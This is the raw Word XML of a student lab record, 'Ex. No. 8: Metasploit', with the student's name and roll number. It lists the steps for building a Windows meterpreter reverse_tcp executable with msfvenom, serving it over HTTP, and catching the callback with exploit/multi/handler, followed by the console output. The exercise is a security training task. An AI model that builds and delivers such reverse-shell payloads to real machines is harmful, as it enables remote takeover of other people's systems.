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EF60" w14:textId="76045CBE" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="115"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Name: Ja</w:t>
      </w:r>
      <w:r w:rsidR="003C3202">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>yganesh kannan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CC2058" w14:textId="3F427C21" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9099"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Ex. No.: 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t>Roll no:23190101</w:t>
      </w:r>
      <w:r w:rsidR="003C3202">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7901D484" w14:textId="77777777" w:rsidR="00C3094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642B23B" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="160" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">METASPLOIT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC5906" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000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6FB021FB" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="115"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Aim: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53147C1D" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="105" w:firstLine="721"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To set up Metasploit framework and exploit reverse_tcp in Windows 8 machine remotely. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EA4DF5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BD9FA5" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="115"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Algorithm: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA26F82" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="245"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Generate payload to be inserted into the remote machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119C9DA7" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="245"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set the LHOST and it’s port number </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4058D7D3" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="245"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open msfconsole. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C906C" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="245"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D3FC0" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="245"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Establish reverse_tcp with the remote windows 8 machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12236B4A" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="245"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run SimpleHTTPServer with port number 8000. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D7B4BF" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="245"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open the web browser in Windows 8 machine and type http://172.16.8.155:8000 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353DEC70" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="245"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In KaliLinux, type sysinfo to get the information about Windows 8 machine </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A451A4" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:hanging="245"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a new directory using mkdir command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DCC8F5" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.Delete the created directory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E164AAD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83BA96F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3DFF851" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115" w:right="861"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Output: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.8.155 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624611F7" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LPORT=443 -f exe &gt; /root/hi.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C2911" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A304012" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115" w:right="3094"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2816FD02" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload size: 341 bytes </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F502FB" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115" w:right="4392"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Final size of exe file: 73802 bytes root@kali:~# msfconsole </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16801514" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[-] ***Rting the Metasploit Framework console...\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB55517" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="821" w:right="562" w:hanging="716"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[-] * WARNING: No database support: could not connect to server: Connection refused Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298E2F5E" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">could not connect to server: Connection refused </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBC0516" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="851" w:right="1142"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Is the server running on host "localhost" (127.0.0.1) and accepting TCP/IP connections on port 5432? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1BF1F7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1E4375" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[-] *** </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710EB837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BE1894" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="3484"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">_ </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">_ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C1D6B0" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="619"/>
          <w:tab w:val="center" w:pos="1229"/>
          <w:tab w:val="center" w:pos="1580"/>
          <w:tab w:val="center" w:pos="3028"/>
          <w:tab w:val="center" w:pos="3690"/>
          <w:tab w:val="center" w:pos="4293"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/ \ </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">/\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  <w:r>
        <w:tab/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/_/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3E55C726" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2569"/>
          <w:tab w:val="center" w:pos="2805"/>
          <w:tab w:val="center" w:pos="4009"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">| |\ / |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CF3262" wp14:editId="7DCCB862">
                <wp:extent cx="454152" cy="6097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52" cy="6097"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="454152" cy="6097"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5180" name="Shape 5180"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="454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9144">
                                <a:moveTo>
                                  <a:pt x="0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454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" style="width:35.76pt;height:0.480042pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="4541,60">
                <v:shape id="Shape 5181" style="position:absolute;width:4541;height:91;left:0;top:0;" coordsize="454152,9144" path="m0,0l454152,0l45415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\ \ </w:t>
      </w:r>
      <w:r>
        <w:tab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CA7F30" wp14:editId="407E2A61">
                <wp:extent cx="299009" cy="6097"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"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9" cy="6097"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="299009" cy="6097"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5182" name="Shape 5182"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="2990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09" h="9144">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="299009" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2990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2" style="width:23.544pt;height:0.480042pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="2990,60">
                <v:shape id="Shape 5183" style="position:absolute;width:2990;height:91;left:0;top:0;" coordsize="299009,9144" path="m0,0l299009,0l2990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| | / \ _ \ \ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC5D2E5" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1529"/>
          <w:tab w:val="center" w:pos="3085"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>| | \/| | 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\ |- -| /\ </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t>\ | -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/ | || | || | |- -| </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F389014" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="2045"/>
          <w:tab w:val="center" w:pos="3614"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>|_| | | | _|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| |_ / -\ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">\ \   | | </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>| | \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/| | | |_ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC36E4" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="622"/>
          <w:tab w:val="center" w:pos="1368"/>
          <w:tab w:val="center" w:pos="2117"/>
          <w:tab w:val="center" w:pos="2929"/>
          <w:tab w:val="center" w:pos="3599"/>
          <w:tab w:val="center" w:pos="4226"/>
          <w:tab w:val="center" w:pos="482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|/ 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/ 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\/ /\ \\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/   \/ </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>|_\ 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\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2AAC2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9EDBDD4" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="10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0983054" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1784"/>
          <w:tab w:val="center" w:pos="46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=[ metasploit v5.0.41-dev </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7982D6D6" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5346"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+ -- --=[ 1914 exploits - 1074 auxiliary - 330 post </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B78C528" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="5313"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+ -- --=[ 556 payloads - 45 encoders - 10 nops </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53305B48" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="4266"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+ -- --=[ 4 evasion </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012ACB80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CDA804" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf5 &gt; use exploit/multi/handler </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B39C57" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="262"/>
        <w:ind w:left="115" w:right="1732"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf5 exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_tcp payload =&gt; windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) &gt; show options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A817059" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="268"/>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module options (exploit/multi/handler): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BFEFC3" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="312"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Name Current Setting Required Description </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185DAEC2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D0614AE" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="7" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="3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2CB231" wp14:editId="24BCCB4F">
                <wp:extent cx="2157730" cy="11278"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4368" name="Group 4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11278"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2157730" cy="11278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201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79400" y="0"/>
                            <a:ext cx="760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095">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7600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115695" y="0"/>
                            <a:ext cx="407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">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="407670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599565" y="0"/>
                            <a:ext cx="558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">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5581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8" style="width:169.9pt;height:0.88803pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="21577,112">
                <v:shape id="Shape 827" style="position:absolute;width:2012;height:0;left:0;top:0;" coordsize="201295,0" path="m0,0l201295,0">
                  <v:stroke weight="0.88803pt" endcap="flat" dashstyle="3.00001 1" joinstyle="round" on="true" color="#000000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 828" style="position:absolute;width:7600;height:0;left:2794;top:0;" coordsize="760095,0" path="m0,0l760095,0">
                  <v:stroke weight="0.88803pt" endcap="flat" dashstyle="3.00001 1" joinstyle="round" on="true" color="#000000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 829" style="position:absolute;width:4076;height:0;left:11156;top:0;" coordsize="407670,0" path="m0,0l407670,0">
                  <v:stroke weight="0.88803pt" endcap="flat" dashstyle="3.00001 1" joinstyle="round" on="true" color="#000000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 830" style="position:absolute;width:5581;height:0;left:15995;top:0;" coordsize="558165,0" path="m0,0l558165,0">
                  <v:stroke weight="0.88803pt" endcap="flat" dashstyle="3.0000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D543DA3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3CD7BAB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0E26B6" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload options (windows/meterpreter/reverse_tcp): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EFFAEB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79EB4D" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="586"/>
          <w:tab w:val="center" w:pos="30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</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Current Setting Required Description </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F44D252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E457C77" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="38" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="3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D05071" wp14:editId="47AAE87A">
                <wp:extent cx="2310130" cy="11278"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4369" name="Group 4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11278"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2310130" cy="11278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201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431800" y="0"/>
                            <a:ext cx="760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095">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7600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1268730" y="0"/>
                            <a:ext cx="407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035">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="40703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751965" y="0"/>
                            <a:ext cx="558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">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5581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9" style="width:181.9pt;height:0.88803pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="23101,112">
                <v:shape id="Shape 831" style="position:absolute;width:2012;height:0;left:0;top:0;" coordsize="201295,0" path="m0,0l201295,0">
                  <v:stroke weight="0.88803pt" endcap="flat" dashstyle="3.00001 1" joinstyle="round" on="true" color="#000000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 832" style="position:absolute;width:7600;height:0;left:4318;top:0;" coordsize="760095,0" path="m0,0l760095,0">
                  <v:stroke weight="0.88803pt" endcap="flat" dashstyle="3.00001 1" joinstyle="round" on="true" color="#000000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 833" style="position:absolute;width:4070;height:0;left:12687;top:0;" coordsize="407035,0" path="m0,0l407035,0">
                  <v:stroke weight="0.88803pt" endcap="flat" dashstyle="3.00001 1" joinstyle="round" on="true" color="#000000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 834" style="position:absolute;width:5581;height:0;left:17519;top:0;" coordsize="558165,0" path="m0,0l558165,0">
                  <v:stroke weight="0.88803pt" endcap="flat" dashstyle="3.0000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C4B1A2" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="1312"/>
          <w:tab w:val="center" w:pos="3084"/>
          <w:tab w:val="right" w:pos="90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EXITFUNC process  </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">yes </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Exit technique (Accepted: '', seh, thread, process, none) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DF4382" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="688"/>
          <w:tab w:val="center" w:pos="51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LHOST </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">yes  The listen address (an interface may be specified) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D99C9" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="center" w:pos="680"/>
          <w:tab w:val="center" w:pos="1599"/>
          <w:tab w:val="center" w:pos="2781"/>
          <w:tab w:val="center" w:pos="40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LPORT </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">4444 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">yes </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The listen port </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26717968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4B45E6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C56E75" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploit target: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B598C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16F792" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="312"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Id Name </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B248037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257B8A3" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="40" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="3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A559AE" wp14:editId="1C6E1505">
                <wp:extent cx="380365" cy="11278"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4370" name="Group 4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11278"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="380365" cy="11278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77165" y="0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266410" sp="8880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70" style="width:29.95pt;height:0.88803pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="3803,112">
                <v:shape id="Shape 835" style="position:absolute;width:1009;height:0;left:0;top:0;" coordsize="100965,0" path="m0,0l100965,0">
                  <v:stroke weight="0.88803pt" endcap="flat" dashstyle="3.00001 1" joinstyle="round" on="true" color="#000000"/>
                  <v:fill on="false" color="#000000" opacity="0"/>
                </v:shape>
                <v:shape id="Shape 836" style="position:absolute;width:2032;height:0;left:1771;top:0;" coordsize="203200,0" path="m0,0l203200,0">
                  <v:stroke weight="0.88803pt" endcap="flat" dashstyle="3.0000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A532C65" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="312"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">0 Wildcard Target </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DAD6D0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D6FC547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3EFF4DC" w14:textId="77777777" w:rsidR="00C3094F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="115" w:right="2809"/>
      </w:pPr>
      <w:r>
